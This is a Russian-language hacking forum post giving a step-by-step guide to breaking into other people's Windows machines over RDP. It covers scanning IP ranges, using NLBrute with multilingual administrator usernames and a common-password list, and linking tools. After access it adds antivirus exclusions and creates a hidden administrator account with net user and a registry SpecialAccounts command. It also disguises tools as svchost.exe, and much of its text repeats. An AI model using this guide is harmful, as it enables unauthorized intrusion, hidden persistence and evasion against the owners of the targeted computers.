Ilyapro
Резидент
Так, как гайдов уже немало, постараюсь написать чего-нибудь нового.
Дедик - это удалённый пк, к которому можно подключиться с помощью стандартной программы Windows "mstsc.exe". Подключиться получиться, если на пк открыт определённый порт, вводимый нами при подключении. На дедике можно делать всё, что душе угодно(но лучше не надо, читай дальше).
Итак, что же потребуется для брута дедиков?
Список сайтов, откуда можно взять диапазоны
Диапазоны по городу можно взять отсюда - 4it.me, есть очень точная база России.
А также, можно скачать программу IP-city и взять оттуда (обновил для вас списки ip в ней). Скачать, VirusTotal, HybridAnalysis.
Краткий мануал по IP-city
VNCscan - подойдёт и для динамичных ip-адресов, но медленнее
xDedic Ip scanner
Tcp Port Scanner , если у вас пк подключён напрямую к внешнему роутеру (очень быстрый)
Логин - "администратор" на разных языках.
Пароли. Вот они уже зависят от регистра. Вот список самых частых паролей. Не делайте их тоже слишком много (максимум 1 мегабайт).
Пароли для брута
4. Скачать можно с любого другого борда.
Запускаем NLBrute 1.2. Переходим на вкладку "WORK FILES". В поле "Servers" выбираем ip-адреса (адреса, а не диапазоны!). Ну, остальные поля - понятно. Не забудьте нажать "Generate"!
Ставим настройки, советую, если мощный пк, ставить вот так (даже не грузит проц)
Убираем галку с пункта "Servers checking" (обязательно). И во вкладке "BRUTE" жмём Start. После закрытия программы можно нажать Continue!
Good count - количество наших дедиков! Сохраняется в файле "good.txt".
5. Вот и нашёлся первый дедик.
Способ для новичков:
Все программы храните в системных папках. Называйте их "svchost.exe" или "system.exe". Если дедик включён круглосуточно, то брутьте ночью, админы спят :trollface:. В браузере используйте инкогнито и так далее.
Дедик - это удалённый пк, к которому можно подключиться с помощью стандартной программы Windows "mstsc.exe". Подключиться получиться, если на пк открыт определённый порт, вводимый нами при подключении. На дедике можно делать всё, что душе угодно(но лучше не надо, читай дальше).
Итак, что же потребуется для брута дедиков?
- IP-диапазоны нужной страны или города.
- Cканер ip-диапазонов (masscan, vncscan, xDedic IP scanner , tcp port scanner)
- Два текстовых файла - возможные логины и пароли.
- Программа для подбирания учёток из ваших логинов и паролей. Т.е прога для, собственно, брута (лучший вариант для поиска новых пк - NLBrute 1.2)
- xDedic RDP Patch для создания скрытой учётки на дедике. Или набор команд для "cmd.exe"
Список сайтов, откуда можно взять диапазоны
http://www.find-ip-address.org/ip-country/
http://www.ipaddresslocation.org/
http://www.proxyserverprivacy.com/ipaddress_range.php
http://ipdiapazon.16mb.com/ (на этом сайте списки не очень новые)
http://www.ipaddresslocation.org/
http://www.proxyserverprivacy.com/ipaddress_range.php
http://ipdiapazon.16mb.com/ (на этом сайте списки не очень новые)
Диапазоны по городу можно взять отсюда - 4it.me, есть очень точная база России.
А также, можно скачать программу IP-city и взять оттуда (обновил для вас списки ip в ней). Скачать, VirusTotal, HybridAnalysis.
Краткий мануал по IP-city
Как получить ip-диапазоны:
Для обновления списков скачайте GeoLite Country CSV/ZIP и GeoLite City CSV/ZIP отсюда. Затем распакуйте csv файлы в папку с программой.
2. Я рассмотрю все самые лучшие программы для скана ip-диапазонов и какой подойдёт лучше для вас.
Для обновления списков скачайте GeoLite Country CSV/ZIP и GeoLite City CSV/ZIP отсюда. Затем распакуйте csv файлы в папку с программой.
2. Я рассмотрю все самые лучшие программы для скана ip-диапазонов и какой подойдёт лучше для вас.
VNCscan - подойдёт и для динамичных ip-адресов, но медленнее
Скачать программу. VirusTotal. HybridAnalysis.
Буду использовать опять GUI, так как в ней тот же функционал, что и в консольной версии.
Выбираем нужное количество потоков "-T" и нажимаем "Start scan". Когда окно со сканированием закроется, вы получите ip-адреса (не должно закрыться сразу).
Готово!
Буду использовать опять GUI, так как в ней тот же функционал, что и в консольной версии.
Выбираем нужное количество потоков "-T" и нажимаем "Start scan". Когда окно со сканированием закроется, вы получите ip-адреса (не должно закрыться сразу).
Готово!
xDedic Ip scanner
YD: https://yadi.sk/d/hIBXMIAo0DizPw VirusTotal.
Упрощённая версия сканера ip-диапазонов.
Выставляем 3389 - стандартный RDP порт во вкладке "Port(s)". Жмём "Start" и дожидаемся ip-адресов с открытыми портами (которые мы прописали). Они сохраняются в txt файл "ScannedIp's" в папке с программой.
Готово!
Упрощённая версия сканера ip-диапазонов.
Выставляем 3389 - стандартный RDP порт во вкладке "Port(s)". Жмём "Start" и дожидаемся ip-адресов с открытыми портами (которые мы прописали). Они сохраняются в txt файл "ScannedIp's" в папке с программой.
Готово!
Tcp Port Scanner , если у вас пк подключён напрямую к внешнему роутеру (очень быстрый)
Скачать. VirusTotal.
Использует новую технологию сканирования, благодаря подключению пк напрямую к выходящему в глобальную сеть роутеру.
Жмём options и делаем, как на скриншоте
Там, где надо прописать порты, пишем 3389 - стандартный порт RDP.
Жмём "Start scan" и ждём результатов.
Готово!
Порт 3389 знает каждый 2-й пользователь. Поэтому дедики могут часто попасться уже брученные. Чтобы избежать этого, используем вот эти порты:
3350-3500,139, 4899,5900,4444.
Разъясню, за что какой порт отвечает простыми словами.
3350 - 3500 - просто стандартное подключение по "mstsc.exe". 139 - подключение к ftp серверу (имеем доступ к данным хард диска). 4899 - использует программа RAdmin. 5900 - vnc подключение (подробнее, тут https://habrahabr.ru/post/76343/). 4444 - червь W32.Blaster.Worm
После сканирования можете проверить на подключение RDP программой rdp solid scanner v2.1. Это уменьшит кол-во мусора в разы.
Скачать - https://mega.nz/#!0scxxaYA!yvvWAg59WXvBjwdOZaP3-Zwb1GADCHM-mwwilUXQgX8
Пароль - fuckav
3. Логины. Главная истина - они не зависят от регистра. Т.е Админ или админ, разницы нет никакой. А ещё, они должны подходить к языку в стране.
Для брута подойдут типичные логины (не делайте их слишком много, до конца жизни будете брутить :biggrin:)
Использует новую технологию сканирования, благодаря подключению пк напрямую к выходящему в глобальную сеть роутеру.
Жмём options и делаем, как на скриншоте
Там, где надо прописать порты, пишем 3389 - стандартный порт RDP.
Жмём "Start scan" и ждём результатов.
Готово!
Порт 3389 знает каждый 2-й пользователь. Поэтому дедики могут часто попасться уже брученные. Чтобы избежать этого, используем вот эти порты:
3350-3500,139, 4899,5900,4444.
Разъясню, за что какой порт отвечает простыми словами.
3350 - 3500 - просто стандартное подключение по "mstsc.exe". 139 - подключение к ftp серверу (имеем доступ к данным хард диска). 4899 - использует программа RAdmin. 5900 - vnc подключение (подробнее, тут https://habrahabr.ru/post/76343/). 4444 - червь W32.Blaster.Worm
После сканирования можете проверить на подключение RDP программой rdp solid scanner v2.1. Это уменьшит кол-во мусора в разы.
Скачать - https://mega.nz/#!0scxxaYA!yvvWAg59WXvBjwdOZaP3-Zwb1GADCHM-mwwilUXQgX8
Пароль - fuckav
3. Логины. Главная истина - они не зависят от регистра. Т.е Админ или админ, разницы нет никакой. А ещё, они должны подходить к языку в стране.
Для брута подойдут типичные логины (не делайте их слишком много, до конца жизни будете брутить :biggrin:)
Логин - "администратор" на разных языках.
1.Японский(Japanise)
運営者
支配人
2.Немецкий(Germany)
Verwalter
Verwaltungsbeamte
3.Итальянский(italian)
addetto
responsabile
4.Польский(Polish)
administrater
glowny
zarządca
rządca
organizator
opiekun
5.Арабский(Arabic)
مصف
المدير المنتدب
6.Датский(Ducth)
bestuurder
bewindvoerder
7.Китайский(Chinese)
署長
管理人
管理員
經紀
行政官員
8.Эстонский(Estonian)
haldur
juhtija
juhataja
9.Украинский(Ukrainian)
адміністратор
завідатель
опікун
управитель
управляючий
10.Вьетнамский(Vietnamese)
Quản trị viên
11.Албанский(Albanian)
drejtues
12.Болгарский
управител
администратор
ръководител
управител на имот
13.Испанский
administrador
14.Голландский
administrateur
bestuurder
beheerder
bewindvoerder
15.Чешский
Správce
16.Французский
administrateur
directeur
17.Финский
administraterii
administrateri
administrateree
18.Бразилия (Brazil)
operador
administrador
19.Россия
Администратор
Админ
20.Литовский
Administratorius
21.Мальта
Amministratur
22.Португалия
Administrador
23.Словакия
Správca
24.Турция
Yönetici
25.Франция
Administrateur
26.Чехия
Správce
27.Швеция
Administratör
運営者
支配人
2.Немецкий(Germany)
Verwalter
Verwaltungsbeamte
3.Итальянский(italian)
addetto
responsabile
4.Польский(Polish)
administrater
glowny
zarządca
rządca
organizator
opiekun
5.Арабский(Arabic)
مصف
المدير المنتدب
6.Датский(Ducth)
bestuurder
bewindvoerder
7.Китайский(Chinese)
署長
管理人
管理員
經紀
行政官員
8.Эстонский(Estonian)
haldur
juhtija
juhataja
9.Украинский(Ukrainian)
адміністратор
завідатель
опікун
управитель
управляючий
10.Вьетнамский(Vietnamese)
Quản trị viên
11.Албанский(Albanian)
drejtues
12.Болгарский
управител
администратор
ръководител
управител на имот
13.Испанский
administrador
14.Голландский
administrateur
bestuurder
beheerder
bewindvoerder
15.Чешский
Správce
16.Французский
administrateur
directeur
17.Финский
administraterii
administrateri
administrateree
18.Бразилия (Brazil)
operador
administrador
19.Россия
Администратор
Админ
20.Литовский
Administratorius
21.Мальта
Amministratur
22.Португалия
Administrador
23.Словакия
Správca
24.Турция
Yönetici
25.Франция
Administrateur
26.Чехия
Správce
27.Швеция
Administratör
Пароли для брута
adm
admin
admins
administrator
administrators
Administrator
Admin
Admin1
admin1
adminadmin
support
pwd
pass
passw
passwd
password
passwords
pass1234
12
123
1234
12345
123456
12345678
1234567890
123321
121212
123123
qwert
qwerty
qweqwe
q1w2e3
123ewq
qwe321
123qwe
1qazxsw2
12qwaszx
1234rewq
qweasd
stop
enjoy
ip
america
sex
ftp
power
computer
system
windows
linux
root
user
guest
account
id
key
keys
user
users
usr
admin
admins
administrator
administrators
Administrator
Admin
Admin1
admin1
adminadmin
support
pwd
pass
passw
passwd
password
passwords
pass1234
12
123
1234
12345
123456
12345678
1234567890
123321
121212
123123
qwert
qwerty
qweqwe
q1w2e3
123ewq
qwe321
123qwe
1qazxsw2
12qwaszx
1234rewq
qweasd
stop
enjoy
ip
america
sex
ftp
power
computer
system
windows
linux
root
user
guest
account
id
key
keys
user
users
usr
4. Скачать можно с любого другого борда.
Запускаем NLBrute 1.2. Переходим на вкладку "WORK FILES". В поле "Servers" выбираем ip-адреса (адреса, а не диапазоны!). Ну, остальные поля - понятно. Не забудьте нажать "Generate"!
Ставим настройки, советую, если мощный пк, ставить вот так (даже не грузит проц)
Убираем галку с пункта "Servers checking" (обязательно). И во вкладке "BRUTE" жмём Start. После закрытия программы можно нажать Continue!
Good count - количество наших дедиков! Сохраняется в файле "good.txt".
5. Вот и нашёлся первый дедик.
Способ для новичков:
- Подключаемся, входим в систему.
- Далее проверяем наличие антивируса, если его нет - отлично, если есть, добавляем папку Название диска: \Windows - в исключения.
- Создаём там папку (не слишком палевное название, например, "Check"). Скачиваем xDedicRDPPatch - отсюда на свой пк, затем жмём "копировать", переключаемся на "mstsc.exe" и жмём "вставить" в созданную папку.
- Запускаем от имени администратора! Если напротив надписи RdpPatch - no, то ставим галку "Patch RDP". Ставим галку "Self delete and logout". Пишем свои будущие логин и пароль (будете использовать в дальнейшем только их). Патчим!
- Нас отключило, теперь заходим ещё раз, но используя свои логин и пароль. Пользуемся.
Код:
net user ВАШ_ЛОГИН ВАШ_ПАРОЛЬ /add
net localgroup Администраторы ВАШ_ЛОГИН /add
net localgroup "Пользователи удаленного рабочего стола" ВАШ_ПАРОЛЬ /add
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ВАШ_ЛОГИН /t REG_DWORD /d 0 /f
Все программы храните в системных папках. Называйте их "svchost.exe" или "system.exe". Если дедик включён круглосуточно, то брутьте ночью, админы спят :trollface:. В браузере используйте инкогнито и так далее.